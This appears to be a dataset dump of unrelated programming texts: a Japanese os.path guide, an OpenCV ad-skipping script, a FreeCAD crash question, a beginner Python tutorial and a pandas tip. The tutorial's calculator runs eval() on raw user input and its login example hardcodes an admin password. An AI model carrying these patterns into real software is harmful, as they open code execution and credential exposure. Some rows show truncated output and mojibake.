text
stringlengths 256
65.5k
|
|---|
こんにちは!
皆さんは、相対パスを絶対パスに、絶対パスを相対パスに変換したいと思ったことはありませんか?
相対パスを絶対パスに変換するには、「os.path.abspath()」、絶対パスを相対パスに変換するには、「os.path.relpath()」を使うと、簡単にできますよ。
今回の記事では、以下の内容について紹介します。
相対パスを絶対パスに変換する方法
絶対パスを相対パスに変換する方法
相対パスと絶対パスの相互変換
相対パスを絶対パスに変換する方法
相対パスを絶対パスに変換するには、「os.path.abspath()」を使用します。
import os
print(os.path.abspath(".."))
print(os.path.abspath(""))
print(os.path.abspath("testdir"))
実行結果
/Users/(ユーザ名)/Desktop
/Users/(ユーザ名)/Desktop/test
/Users/(ユーザ名)/Desktop/test/testdir
対応した絶対パスを返してくれていますね!
ちなみに何も指定しないと、カレントディレクトリの絶対パスを返してくれます。(実行結果2行目)
絶対パスを相対パスに変換する方法
絶対パスを相対パスに変換するには、「os.path.relpath()」を使用します
import os
print(os.path.relpath("/Users/(ユーザ名)/Desktop"))
print(os.path.relpath("/Users/(ユーザ名)/Desktop/test"))
print(os.path.relpath("/Users/(ユーザ名)/Desktop/test/testdir"))
実行結果
...testdir
relpathでは、エラーが出ます。
print(os.path.relpath(""))
実行結果
ValueError: no path specified
この注意点はしっかりと覚えておきましょう!
まとめ
今回の記事では、以下の内容について紹介しました。
相対パスを絶対パスに変換する方法
→「os.path.abspath()」を使用
絶対パスを相対パスに変換する方法
→「os.path.relpath()」を使用
皆さんも両方を覚えて、しっかりと相互変換できるようになりましょう!
|
TL;DR: Install OpenCV-Python, download this script and follow the instructions in the script’s --help output.
While I like The Young Turks, they’ve recently started adding the same two or three carnival barker-esque appeals for subscribers to the end of all of their videos. That gets very annoying very quickly.
Since I don’t believe in rewarding bad behaviour (like forcing avid viewers to see the same couple of annoying ads a million times), I refuse to let them nag me into being a member. However, I still need something to occupy my mind while doing boring tasks, so I needed a solution.
As such, here’s a Python OpenCV script which will find the time offset of the first last occurrence of a frame in a video file (eg. a screenshot of the TYT title card that appears between the content and the ad) in a video file and then write an MPV EDL (Edit Decision List) file which will play only the portion of the video prior to the matched frame.
UPDATE: Hint: Put this script, your videos, and one or more screenshots (to be matched in a fallback chain, sorted by name) into the same folder and you can just double-click it.
I’ve also done the preliminary research to fuzzy-match the audio of those two or three naggy bits in case they decide to try to render this ineffective by moving the title card to the very end… partly because it would also give a more accurate cut point if used with the current clips.
(As is, I tend to lose the last 500 to 1500 milliseconds of actual content due to variations in how how they cut the pieces of each clip together… but, even if I lost an entire clip every now and then, it’d be an acceptable sacrifice to avoid those annoying nags. Current clips are cut together such that stopping at the last frame of the end-title card removes the nag perfectly.)
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# pylint: disable=line-too-long
"""Utility for generating MPV EDL files to skip recurring post-roll ads.
Instructions:
1. Use MPV's screenshot hotkey to extract a frame that's consistently present
at the boundary between the content and the ad.
2. Run this script with the screenshot specified via the --template argument.
3. Play the resulting EDL file in MPV.
(MPV EDL files are like playlists which can specify pieces of video files
rather than entire files)
--snip--
TODO:
- Gather and maintain statistics on which templates matched in a given folder
so that the order in which templates are tried can learn as a way to optimize
the total runtime.
- Read http://docs.opencv.org/trunk/d4/dc6/tutorial_py_template_matching.html
- Consider rewriting in Rust to ease shaking the bugs out:
http://www.poumeyrol.fr/doc/opencv-rust/opencv/imgproc/fn.match_template.html
Sources used to develop this:
- https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_gui/py_video_display/py_video_display.html#playing-video-from-file
- https://pythonprogramming.net/template-matching-python-opencv-tutorial/
- http://stackoverflow.com/q/9629071
- http://stackoverflow.com/a/10979030
- http://stackoverflow.com/a/2981202
- https://github.com/mpv-player/mpv/blob/master/DOCS/edl-mpv.rst
- http://smplayer.sourceforge.net/en/mpv
Stuff I tried but threw out because of a bug outside my control:
- http://www.mplayerhq.hu/DOCS/HTML/en/edl.html
- http://forum.smplayer.info/viewtopic.php?p=15706#p15706
Sources used during development:
- http://www.pyimagesearch.com/2016/03/07/transparent-overlays-with-opencv/
""" # NOQA
from __future__ import (absolute_import, division, print_function,
with_statement, unicode_literals)
__author__ = "Stephan Sokolow (deitarion/SSokolow)"
__appname__ = "TYT Post-Roll Ad Eliminator"
__version__ = "0.1"
__license__ = "MIT"
VIDEO_GLOBS = ['*.mp4', '*.webm']
FRAME_GLOBS = ['*.png', '*.jpg']
import fnmatch, logging, os, re
import cv2 as cv
import numpy as np
log = logging.getLogger(__name__)
# Borrowed from:
# https://github.com/ssokolow/game_launcher/blob/master/src/util/common.py
# (Revision: bc784a5fe3c2d4275fef5ec16612bd67142eb0f8)
# TODO: Put this up on PyPI so I don't have to copy it around.
def multiglob_compile(globs, prefix=False, re_flags=0):
"""Generate a single "A or B or C" regex from a list of shell globs.
:param globs: Patterns to be processed by :mod:`fnmatch`.
:type globs: iterable of :class:`~__builtins__.str`
:param prefix: If ``True``, then :meth:`~re.RegexObject.match` will
perform prefix matching rather than exact string matching.
:type prefix: :class:`~__builtins__.bool`
:rtype: :class:`re.RegexObject`
"""
if not globs:
# An empty globs list should only match empty strings
return re.compile('^$')
elif prefix:
globs = [x + '*' for x in globs]
return re.compile('|'.join(fnmatch.translate(x) for x in globs), re_flags)
video_ext_re = multiglob_compile(VIDEO_GLOBS, re.I)
frame_ext_re = multiglob_compile(FRAME_GLOBS, re.I)
def edl_path_for(video_path):
"""Single place where EDL-path lookup is defined"""
return os.path.splitext(video_path)[0] + '.mpv.edl'
def has_edl(video_path, edl_path=None):
"""Unified definition of how to check whether we should skip a file"""
edl_path = edl_path or edl_path_for(video_path)
# TODO: Also handle the "is EDL" case
if os.path.exists(edl_path):
log.info("EDL already exists. Skipping %r", video_path)
return True
return False
def seek_stream(stream, offset):
"""If offset is negative, it will be treated as a "seconds from the end"
value, analogous to Python list indexing.
"""
fps = stream.get(cv.CAP_PROP_FPS) # pylint: disable=no-member
if offset > 0:
offset *= fps
elif offset < 0:
frame_count = stream.get(
cv.CAP_PROP_FRAME_COUNT) # pylint: disable=no-member
offset = frame_count + (offset * fps)
# It seems seeking via CAP_PROP_POS_MSEC doesn't work
stream.set(cv.CAP_PROP_POS_FRAMES, offset) # pylint: disable=no-member
def find_frame(stream, template, start_pos=None, last_match=None):
"""Given a video stream and a frame, find its offset in seconds.
If start_pos is negative, it will be treated as a "seconds from the end"
value, analogous to Python list indexing.
Does NOT release the stream when finished so it can be used in a manner
similar to file.seek().
Returns the offset in seconds or None for no match.
"""
offset, match = 0, None
# Seek to near the end to minimize processing load
if start_pos is not None:
log.debug("Seeking to %s...", start_pos)
seek_stream(stream, start_pos)
log.debug("Analyzing...")
while stream.isOpened():
success, frame = stream.read()
if not success:
break
offset = stream.get(
cv.CAP_PROP_POS_MSEC) / 1000 # pylint: disable=no-member
# Use template-matching to find the frame signifying the end of content
# pylint: disable=no-member
gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)
res = cv.matchTemplate(gray, template, cv.TM_CCOEFF_NORMED)
threshold = 0.8
loc = np.where(res >= threshold) # pylint: disable=no-member
if len(loc[0]): # bool(loc[0]) gives undesired results
if match and (offset - match) > 1:
log.debug("Returning last frame in first match at %s", match)
return match
else:
match = offset
log.debug("Match at %s", match)
if match and not last_match:
log.debug("Returning first match: %s", match)
return match
log.debug("Returning last match (last offset: %s): %s", offset, match)
return match
def analyze_file(video_path, template_path, start_pos=0, last_match=None):
"""High-level wrapper to ease analyzing multiple videos in a single run"""
if last_match is None:
last_match = not os.path.splitext(template_path)[0].endswith('_first')
# pylint: disable=no-member
template = cv.imread(template_path, 0)
stream = cv.VideoCapture(video_path)
# TODO: Safety check that template size doesn't exceed video frame size
# TODO: Figure out how to deduplicate this
try:
end = (stream.get(cv.CAP_PROP_FRAME_COUNT) /
stream.get(cv.CAP_PROP_FPS))
except ZeroDivisionError:
log.info("FPS is zero in %s. Returning None as end.", video_path)
end = None
try:
offset = find_frame(stream, template, start_pos, last_match)
finally:
stream.release()
cv.destroyAllWindows() # TODO: Do I need this anymore?
return offset, end
def make_edl(video_path, template_path, start_pos=0):
"""Highest-level wrapper to make it easy for other scripts to call this"""
edl_path = edl_path_for(video_path)
if has_edl(video_path, edl_path):
return
offset, _ = analyze_file(video_path, template_path, start_pos)
if offset is not None:
# TODO: Skip if (end - offset) < 3sec
video_name = os.path.basename(video_path)
if video_name.startswith('#'): # '#LoserDonald' is not a comment
video_name = './{}'.format(video_name)
video_name = video_name.encode('utf8') # %len% is byte-based
with open(edl_path, 'w') as edl:
edl.write(b"# mpv EDL v0\n%{}%{},0,{:f}".format(
len(video_name), video_name, offset))
return bool(offset)
def make_with_fallbacks(path, templates, skip_to=-30, silent=False):
"""Apply make_edl to a fallback chain of templates"""
if len(templates) < 1:
log.error("len(templates) < 1")
return
# TODO: Do this properly
for tmpl in templates:
try:
log.info("Processing %r with %r", path, tmpl)
success = make_edl(path, tmpl, skip_to)
if success:
break
else:
raise Exception()
except Exception: # pylint: disable=broad-except
log.info("No match for %s in %s", tmpl, path)
else:
if not silent:
log.error("Failed to make EDL for %r", path)
def resolve_path_args(paths, filter_re, default=('.',)):
"""Unified code for resolving video and template arguments"""
if isinstance(paths, basestring):
paths = [paths]
results = []
for path in paths or default:
if os.path.isdir(path):
results.extend(x for x in sorted(os.listdir(path))
if filter_re.match(x))
else:
results.append(path)
assert isinstance(results, list)
return results
def main():
"""The main entry point, compatible with setuptools entry points."""
# If we're running on Python 2, take responsibility for preventing
# output from causing UnicodeEncodeErrors. (Done here so it should only
# happen when not being imported by some other program.)
import sys
if sys.version_info.major < 3:
reload(sys)
sys.setdefaultencoding('utf-8') # pylint: disable=no-member
from argparse import ArgumentParser, RawTextHelpFormatter
parser = ArgumentParser(formatter_class=RawTextHelpFormatter,
description=__doc__.replace('\r\n', '\n').split('\n--snip--\n')[0])
parser.add_argument('--version', action='version',
version="%%(prog)s v%s" % __version__)
parser.add_argument('-v', '--verbose', action="count",
default=2, help="Increase the verbosity. Use twice for extra effect")
parser.add_argument('-q', '--quiet', action="count",
default=0, help="Decrease the verbosity. Use twice for extra effect")
parser.add_argument('--cron', action='store_true',
default=False, help='Silence potentially routine error messages and '
"set a niceness of 19 so OpenCL doesn't interfere with the desktop")
parser.add_argument('-t', '--template', action='append',
help="The frame to search for within the video stream. May be given "
"multiple times to specify a fallback chain. If a directory path "
"is provided, the image files within will be sorted by name "
"and added to the fallback chain. (default: the current directory"
")")
# TODO: Try 30, then back off to 60 if no match.
parser.add_argument('--skip-to', default=-60, type=int,
help="Seek to this position (in seconds) before processing to reduce "
"wasted CPU cycles. Negative values are relative to the end of "
"the file. (default: %(default)s)")
parser.add_argument('video', nargs='*', help="Path to video file "
"(The current working directory will be searched for "
"video files if none are provided)")
args = parser.parse_args()
# Set up clean logging to stderr
log_levels = [logging.CRITICAL, logging.ERROR, logging.WARNING,
logging.INFO, logging.DEBUG]
args.verbose = min(args.verbose - args.quiet, len(log_levels) - 1)
args.verbose = max(args.verbose, 0)
logging.basicConfig(level=log_levels[args.verbose],
format='%(levelname)s: %(message)s')
# Minimize CPU scheduler priority if --cron
if args.cron:
os.nice(19)
paths = resolve_path_args(args.video, video_ext_re)
templates = resolve_path_args(args.template, frame_ext_re)
log.debug("Using templates: %r", templates)
# Process with fallback template support
for path in paths:
if not has_edl(path):
make_with_fallbacks(path, templates, args.skip_to, args.cron)
if __name__ == '__main__':
main()
# vim: set sw=4 sts=4 expandtab :
Using OpenCV to automatically skip recurring post-roll ads by Stephan Sokolow is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.
|
Following code causes crash of FreeCAD(0.18), when line with removeObject is executed - Therefore I have it commented:
(This is not the "real" code - I extracted it to show the problem.)
Code: Select all
objectAnn=None
import DraftSnap
class Ui_Dialog:
def start():
snapit(0)
def cb(point):
print("cb called by Snapper", point)
if point.__class__.__name__ == 'Vector':
print("Snapper clicked")
objectAnn.LabelText=["New Text"] #This works
# App.ActiveDocument.removeObject(objectAnn.Label) #THIS MAKES CRASH !!!!!!!!!!!!!!!!!!!!!!1
FreeCAD.ActiveDocument.recompute()
return(print("End cb"))
def snapit(i):
global objectAnn
objectAnn = App.ActiveDocument.addObject("App::AnnotationLabel","FCInfoToMouse")
objectAnn.LabelText=["Einfügepunkt klicken"]
point = FreeCADGui.Snapper.getPoint(callback = Ui_Dialog.cb) #snapit runs through and does not wait here till clicked
print("Line after Snapper",objectAnn.Label)
what = Ui_Dialog
what.start()
I tried it on two Intel-PC's : Win10 with Intel(R) UHD Graphics 620; Win7 with Nvidia GeForce GT 540M)Unhandled Base::Exception caught in GUIApplication::notify.
The error message is: Access violation
Unhandled Base::Exception caught in GUIApplication::notify.
The error message is: Access violation
and an AMD-PC(Win 7,AMD-RadeonR7), always same error.
Is there a solution?
|
[1] Python Made EZ! ð
HîïÃīįì everyone!
Hope y'all are doing great! School is starting real soon, so I hope you have been studying to get ready you are enjoying the last of vacation!
So I made this tutorial on python so that others can try to learn from it and get better! Hopefully, what I say will be comprehensive and easy to read.
Most of it I will write, but sometimes I will include some stuff from other websites which explain better than me. I will put what I've taken in italic, and the sources and helpful links at the bottom.
By the way, this is the first of tutorials in languages I'm making!
I will be covering:
Hello World!: History of Python
Key Terms
Comments
print
Data Types
Variables
- Printing Variables
- Naming Variables
- Changing Variables
Concatenation
Operators
Comparison Operators
Conditionals
-if
-elif
-else
input
A Bit of Lists
forLoops
whileLoops
Functions
Imports
-time
-random
-math
Small Programs and Useful Stuff
ANSIEscape Codes
Links
Goodbye World!: End
Well without any further ado, let's get on with it!
Hello World!: History of Python
Python is a general purpose programming language. It was created by Guido Van Rossum and released in 1991. One of the main features of it is its readability, simple syntax, and few keywords, which makes it great for beginners (with no prior experience of coding) to learn it.
Fun fact: Guido Van Rossum was reading the scripts of Monty Python when he was creating the language; he needed "a name that was short, unique, and slightly mysterious" so he decided to call the language Python.
(Last year we had to make a poem on a important person in Computer Science, so I made one on him: https://docs.google.com/document/d/1yf2T2fFaS3Vwk7zkvN1nPOr8XPXJroL1yHI7z5qhaRc/edit?usp=sharing)
Key Terms
Now before we continue, just a few words you should know:
Console: The black part located at the right/bottom of your screen
Input: stuff that is taken in by the computer (more on this later)
Ouput: the information processed and sent out by the computer (usually in the console)
Errors: actually, a good thing! Don't worry if you have an error, just try to learn from it and correct it. That's how you can improve, by knowing how to correct errors.
Execute: run a piece of code
Comments
Comments are used for explaining your code, making it more readable, and to prevent execution when testing code.
This is how to comment:
# this is a comment# it starts with a hashtag ## Python will ignore and not run anything after the hashtag
You can also have multiline comments:
"""this is a multiline commentI can make it very long!"""
The print() functions is used for outputting a message (object) onto the console. This is how you use it:
print("Something.")
# remember this is a comment
# you can use double quotes "
# or single quotes '
print('Using single quotes')
print("Is the same as using double quotes")
You can also triple quotes for big messages.
Example:
print("Hello World!")
print("""
Rules:
[1] Code
[2] Be nice
[3] Lol
[4] Repeat
""")
Output:
Hello World!Rules:[1] Code [2] Be nice[3] Lol[4] Repeat
Data Types
Data types are the classification or categorization of data items.
These are the 4 main data types:
int: (integer) a whole number
12 is an int, so is 902.
str: (string) a sequence of characters
"Hi" is a str, so is "New York City".
float: (float) a decimal
-90 is a float, so is 128.84
bool: (boolean) data type with 2 possible values; True and False
Note that True has a capital T and
False has a
capital!
F
Variables
Variables are used for containing/storing information.
Example:
name = "Lucy" # this variable contains a str
age = 25 # this variable contains an int
height = 160.5 # this variable contains a float
can_vote = True # this variable contains a Boolean that is True (because Lucy is 25 y/o)
Printing variables:
To print variables, you simply do print(variableName):
print(name)
print(age)
print(height)
print(can_vote)
Output:
Lucy
25
160.5
True
Naming Variables:
You should try to make variables with a descriptive name. For example, if you have a variable with an age, an appropriate name would be age, not how_old or number_years.
Some rules for naming variables:
must start with a letter (not a number)
no spaces (use underscores)
no keywords (like print,input,or, etc.)
Changing Variables:
You can change variables to other values.
For example:
x = 18
print(x)
x = 19
print(x)
# the output will be:
# 18
# 19
As you can see, we have changed the variable x from the initial value of 18 to 19.
Concatenation
Let's go back to our first 3 variables:
name = "Lucy"
age = 25
height = 160.5
What if we want to make a sentence like this:Her name is Lucy, she is 25 years old and she measures 160.5 cm.
Of course, we could just print that whole thing like this:print("Her name is Lucy, she is 25 years old and she measures 160.5 cm.")
But if we want to do this with variables, we could do it something like this:
print("Her name is " + name + ", she is " + age + " years old and she measures " + height + " cm.")
# try running this!
Aha! If you ran it, you should have gotten this error:
Basically, it means that you cannot concatenate int to str. But what does concatenate mean?
Concatenate means join/link together, like the concatenation of "sand" and "castle" is "sandcastle"
In the previous code, we want to concatenate the bits of sentences ("Her name is ", ", she is", etc.) as well as the variables (name, age, and height).
Since the computer can only concatenate str together, we simply have to convert those variables into str, like so:
print("Her name is " + name + ", she is " + str(age) + " years old and she measures " + str(height) + " cm.")
# since name is already a str, no need to convert it
Output:
Her name is Lucy, she is 25 years old and she measures 160.5 cm.
Operators
A symbol or function denoting an operation
Basically operators can be used in math.
List of operators:
+For adding numbers (can also be used for concatenation) | Eg: 12 + 89 = 101
-For subtracting numbers | Eg: 65 - 5 = 60
*For multiplying numbers | Eg: 12 * 4 = 48
/For dividing numbers | Eg: 60 / 5 = 12
**Exponentiation ("to the power of") | Eg: 2**3 = 8
//Floor division (divides numbers and takes away everything after the decimal point) | Eg: 100 // 3 = 33
%Modulo (divides numbers and returns whats left (remainder)) | Eg: 50 % 30 = 20
These operators can be used for decreasing/increasing variables.
Example:
x = 12
x += 3
print(x)
# this will output 15, because 12 + 3 = 15
You can replace the + in += by any other operator that you want:
x = 6
x *= 5
print(x)
y = 9
y /= 3
print(y)
# this will output 30 and then below 3.
Also: x += y is just a shorter version of writing x = x + y; both work the same
Comparison Operators
Comparsion operators are for, well, comparing things. They return a Boolean value, True or False. They can be used in conditionals.
List of comparison operators:
==equal to | Eg: 7 == 7
!=not equal to | Eg: 7 != 8
>bigger than | Eg: 12 > 8
<smaller than | Eg: 7 < 9
>=bigger than or equal to | Eg: 19 >= 19
<=smaller than or equal to | Eg: 1 <= 4
If we type these into the console, we will get either True or False:
6 > 7 # will return False
12 < 80 # will return True
786 != 787 # will return True
95 <= 96 # will return True
Conditionals
Conditionals are used to verify if an expression is True or False.
if
Example: we want to see if a number is bigger than another one.
How to say in english: "If the number 10 is bigger than the number 5, then etc.
How to say it in Python:
if 10 > 5:
# etc.
All the code that is indented will be inside that if statement. It will only run if the condition is verified.
You can also use variables in conditionals:
x = 20
y = 40
if x < y:
print("20 is smaller than 40"!)
# the output of this program will be "20 is smaller than 40"! because the condition (x < y) is True.
elif
elif is basically like if; it checks if several conditions are True
Example:
age = 16
if age == 12:
print("You're 12 years old!")
elif age == 14:
print("You're 14 years old!")
elif age == 16:
print("You're 16 years old!")
This program will output:
You're 16 years old!
Because age = 16.
else
else usually comes after the if/elif. Like the name implies, the code inside it only executes if the previous conditions are False.
Example:
age = 12
if age >= 18:
print("You can vote!")
else:
print("You can't vote yet!)
Output:
You can't vote yet!
Because age < 18.
input
The input function is used to prompt the user. It will stop the program until the user types something and presses the return key.
You can assign the input to a variable to store what the user types.
For example:
username = input("Enter your username: ")
# then you can print the username
print("Welcome, "+str(username)+"!")
Output:
Enter your username: Bookie0Welcome, Bookie0!
By default, the input converts what the user writes into str, but you can specify it like this:
number = int(input("Enter a number: ")) # converts what the user says into an int
# if the user types a str or float, then there will be an error message.
# doing int(input()) is useful for calculations, now we can do this:
number += 10
print("If you add 10 to that number, you get: "+ str(number)) # remember to convert it to str for concatenation!
Output:
Enter a number: 189If you add 10 to that number, you get: 199
You can also do float(input("")) to convert it to float.
Now, here is a little program summarizing a bit of what you've learnt so far.
Full program:
username = input("Username: ")
password = input("Password: ")
admin_username = "Mr.ADMIN"
admin_password = "[email protected]"
if username == admin_username:
if password == admin_password:
print("Welcome Admin! You are the best!")
else:
print("Wrong password!")
else:
print("Welcome, "+str(username)+"!")
Now a detailed version:
# inputs
username = input("Username: ") # asks user for the username
password = input("Password: ") # asks user for the password
# variables
admin_username = "Mr.ADMIN" # setting the admin username
admin_password = "[email protected]" # setting the admin passsword
# conditionals
if username == admin_username: # if the user entered the exact admin username
if password == admin_password: # if the user enters the exact and correct admin password
print("Welcome Admin! You are the best!") # a welcome message only to the admin
else: # if the user gets the admin password wrong
print("Error! Wrong password!") # an error message appears
else: # if the user enters something different than the admin username
print("Welcome, general user "+str(username)+"!") # a welcome message only for general users
Output:
An option:
Username: Mr.ADMINPassword: i dont knowError! Wrong password!
Another option:
Username: Mr.ADMINPassword: [email protected]Welcome Admin! You are the best!
Final option:
Username: BobPassword: Chee$eWelcome, general user Bob!
A bit of lists
A list is a collection which is ordered and changeable. They are written with square braquets: []
meat = ["beef", "lamb", "chicken"]
print(meat)
Output:
['beef', 'lamb', 'chicken']
You can access specific items of the list with the index number. Now here is the kinda tricky part. Indexes start at 0, meaning that the first item of the list has an index of 0, the second item has an index of 1, the third item has an index of 2, etc.
meat = ["beef", "lamb", "chicken"]
# Index: 0 1 2 etc.
print(meat[2]) # will output "chicken" because it is at index 2
You can also use negative indexing: index -1 means the last item, index -2 means the second to last item, etc.
meat = ["beef", "lamb", "chicken"]
# Index: -3 -2 -1 etc.
print(meat[-3]) # will output "beef" because it is at index -3
You can add items in the list using append():
meat = ["beef", "lamb", "chicken"]
meat.append("pork")
print(meat)
Output:
['beef', 'lamb', 'chicken', 'pork']
"pork" will be added at the end of the list.
For removing items in the list, use remove():
meat = ['beef', 'lamb', 'chicken']
meat.remove("lamb")
print(meat)
Output:
['beef', 'chicken']
You can also use del to remove items at a specific index:
meat = ['beef', 'lamb', 'chicken']
del meat[0]
print(meat)
Output:
['lamb', 'chicken']
There are also many other things you can do with lists, check out this: https://www.w3schools.com/python/python_lists.asp for more info!
for loops
A for loop is used for iterating over a sequence. Basically, it runs a piece of code for a specific number of times.
For example:
for i in range(5):
print("Hello!")
Output:
Hello!Hello!Hello!Hello!Hello!
You can also use the for loop to print each item in a list (using the list from above):
meat = ['beef', 'lamb', 'chicken']
for i in meat:
print(i)
Output:
beeflambchicken
while loops
while loops will run a piece of code as long as the condition is True.
For example:
x = 1 # sets x to 1
while x <= 10: # will repeat 10 times
print(x) # prints x
x += 1 # increments (adds 1) to x
Ouput:
12345678910
You can also make while loops go on for infinity, like so (useful for spamming lol):
while True:
print("Theres no stopping me nowwwww!")
Output:
Theres no stopping me nowwwww!Theres no stopping me nowwwww!Theres no stopping me nowwwww!Theres no stopping me nowwwww!Theres no stopping me nowwwww!# etc until infinity
Functions
Functions are a group of code that will only execute when it is called.
For example, instead having to type a piece of code several times, you can use a function to put that piece of code inside, and then when you need to use it, you can just call it.
def greeting(): # defining the function
print("Bonjour!") # everything that is indented will be executed when the function is called
greeting() # calling the function
# you can now call this function when you want, instead of always writing the same code everytime
Output:
Bonjour!
return and arguments
The return statement is used in function. It ends the function and "returns" the result, i.e. the value of the expression following the return keyword, to the caller. It is not mandatory; you don't have to use it.
You can also have arguments inside a functions. This allows you to change the function values. The arguments are in the parenthesis.
For example:
def sum(x, y): # x and y are the arguments
total = x + y
return total # "assigns" x + y to the function
result = sum(4, 5) # you can change those to what you want
print(result) # this will output 9, because 4+5 = 9
Imports
time
You can use time in your Python programs.
How to make the program wait:
# first import time
import time
print("Hello!")
# then for the program to wait
time.sleep(1) # write how long you want to wait (in seconds) in the parenthesis
print("Bye!")
Output:
Hello!# program will wait 1 secondBye!
You can also do this (more simpler):
import time
from time import sleep
# instead of time.sleep(), do sleep()
# its the same
print("time.sleep(1)...")
time.sleep(1)
print("...is the same as...")
sleep(1)
print("sleep(1)!")
random
You can use the random module to randomly pick numbers with randint():
# remember to import!
import random
from random import randint
rand_num = randint(1,5)
# this will output a random number between 1 and 5 inclusive!
# this means the possible numbers are 1, 2, 3, 4, or 5
The reason I am precising this is because you can also use randrange():
import random
from random import randrange
rand_num = randrange(1,5)
# this will output a random number between 1 inclusive and 5 NON-inclusive (or 4 inclusive)!
# this means the possible numbers are 1, 2, 3, or 4
You can also randomly pick an item from a list with choice():
import random
from random import choice
meat = ["beef", "lamb", "chicken"]
rand_meat = choice(meat)
print(rand_meat)
# this will output a randomly chosen item of the list meat
# the possible outcomes are beef, lamb, or chicken.
math
First, you already have some functions already built in Python: min() and max(). They return the smallest and biggest value of ints inside the parenthesis, respectively.
For example:
list_a = min(18, 12, 14, 16)
list_b = max(17, 19, 15, 13)
print(list_a) # will output 12
print(list_b) # will output 19
Now for some more modules:
You can use math.floor() and math.ceil() to round up numbers to the nearest or highest int.
For example:
# first import
import math
num_a = math.floor(2.3)
num_b = math.ceil(2.3)
print(num_a) # will output 2
print(num_b) # will output 3
Explanation (from Andrew Sutherland's course): So math.floor() will round up 2.3 to the nearest lowest int, which in this case is 2. This is because, if you imagine it, the floor is on the bottom, so thats why it will round the number to the nearest lowest int.
Vice-versa for math.ceil(); it will round up 2.3 to the nearest highest int, which in this case is 3. This is because ceil is short for ceiling (programmers like to shorten words), and the ceiling is high.
You can also get pi Ï:
import math
pi = math.pi
print(pi)
Output:
3.141592653589793
Here is the full list of all the things you can do with math: https://www.w3schools.com/python/module_math.asp
Small Programs You Can Use
Countdown Program:
# imports
import time
from time import sleep
def countdown(): # making a function for the countdown (so you can use it several times)
count = int(input("Countdown from what? ")) # asks user how long the countdown
while count >= 0: # will repeat until count = 0
print(count) # prints where the countdown is at
count -= 1 # subtracts 1 from count
sleep(1) # program waits 1 second before continuing
print("End of countdown!") # message after the countdown
countdown() # remember to call the function or nothing will happen
Output:
Countdown from what? 5543210End of countdown!
Simple Calculator
First way using eval()
calculation = input("Type your calculation: ") # asks the user for a calculation.
print("Answer to " + str(calculation) + ": " + str(eval(calculation)))
# eval basically does the operation, like on a normal calculator.
# however, if you write something different than a valid operaion, there will be an error.
Or another way, using several conditionals, and you can only do "something" + "something" (but with the operators):
def calculator(): # making a function to hold all the code for calculator
while True: # loops forever so you can make several calculations without having to press run again
first_num = int(input("Enter 1st number: ")) # asks user for 1st number
second_num = int(input("Enter 2nd number: ")) # asks user for 2nd number
operator = input("Select operator: + - * / ** // ") # asks user for operator
if operator == "+": # addition
answer = first_num + second_num
print(answer)
elif operator == "-": # subtraction
answer = first_num - second_num
print(answer)
elif operator == "*": # multiplication
answer = first_num * second_num
print(answer)
elif operator == "/": # division
answer = first_num / second_num
print(answer)
elif operator == "**": # exponentiation ("to the power of")
answer = first_num ** second_num
print(answer)
elif operator == "//": # floor division
answer = first_num // second_num
print(answer)
else: # if user selects an invalid operator
print("Invalid!")
calculator() # calls the function
But obviously that is pretty long and full of many if/elif.
Some functions that are useful:
"Press ENTER to continue" Prompt:
def enter():
input("Press ENTER to continue! ")
# this is useful for text based adventure games; when they finish reading some text, they can press ENTER and the next part will follow.
# just call the function where you need it
Spacing in between lines function:
def space():
print()
print()
# same as pressing ENTER twice, this is useful to make your text a bit more airy, makes it less compact and block like.
Slowprint:
# first imports:
import time, sys
from time import sleep
def sp(str):
for letter in str:
sys.stdout.write(letter)
sys.stdout.flush()
time.sleep(0.06)
print()
# to use it:
sp("Hello there!")
# this will output Hello There! one letter every 0.06 seconds, making it look like the typewriter effect.
ANSI Escape Codes
ANSI escape codes are for controlling text in the console. You can use it to make what is in the output nicer for the user.
For example, you can use \n for a new line:
name = input("Enter your name\n>>> ")
Output:
Enter your name>>>
This makes it look nice, you can start typing on the little prompt arrows >>>.
You can also use \t for tab:
print("Hello\tdude")
Output:
Hello dude
\v for vertical tab:
print("Hello\vdude")
Output:
Hello dude
You can also have colors in python:
# the ANSI codes are stored in variables, making them easier to use
black = "\033[0;30m"
red = "\033[0;31m"
green = "\033[0;32m"
yellow = "\033[0;33m"
blue = "\033[0;34m"
magenta = "\033[0;35m"
cyan = "\033[0;36m"
white = "\033[0;37m"
bright_black = "\033[0;90m"
bright_red = "\033[0;91m"
bright_green = "\033[0;92m"
bright_yellow = "\033[0;93m"
bright_blue = "\033[0;94m"
bright_magenta = "\033[0;95m"
bright_cyan = "\033[0;96m"
bright_white = "\033[0;97m"
# to use them:
print(red+"Hello")
# you can also have multiple colors:
print(red+"Hel"+bright_blue+"lo")
# and you can even use it with the slowPrint I mentioned earlier!
Output:
And you can have underline and italic:
reset = "\u001b[0m"
underline = "\033[4m"
italic = "\033[3m"
# to use it:
print(italic+"Hello "+reset+" there "+underline+"Mister!")
# the reset is for taking away all changes you've made to the text
# it makes the text back to the default color and text decorations.
Output:
Links: Sources and Good Websites
Sources:
Always good to use a bit of help from here and there!
W3 Schools: https://www.w3schools.com/python/default.asp
Wikipedia: https://en.wikipedia.org/wiki/Guido_van_Rossum
Wikipedia: https://en.wikipedia.org/wiki/ANSI_escape_code
https://www.python-course.eu/python3_functions.php#:~:text=A%20return%20statement%20ends%20the,special%20value%20None%20is%20returned.
Good Websites you can use:
Official website: https://www.python.org/
W3 Schools: https://www.w3schools.com/python/default.asp
https://www.tutorialspoint.com/python/index.htm
https://realpython.com/
Interactive:
Goodbye World!: End
Well, I guess this is the end. I hope y'all have learnt something new/interesting! If you have any questions, please comment and I will try my best to answer them.
Have a super day everyone!
PS: 6 FEET APART!!!
My beautiful ASCII art:
@ChezCoder Ok Imma check it out.
btw, you say you were warned for advertising when you mentioned your projects on a post; was it your post or someone else's post? if it wasnt your post, then yea I guess that would be advertsising.
also popularity on repl.it doesnt really matter, its mostly how you code ;)
|
pandas の loc などを使うとき、条件に endswith を指定するには次のようにする。
import pandas as pd
df = pd.read_csv('H30.csv', encoding='SHIFT-JIS')
rows = df.loc[df['市区町丁'].str.endswith('計')]
print(rows)
ポイントはここ。
df['市区町丁'].str.endswith('計')
市区町丁という列名の列で、単語が「計」で終わるものだけを選んでいる。通常の条件指定では
df['市区町丁'] == '計'
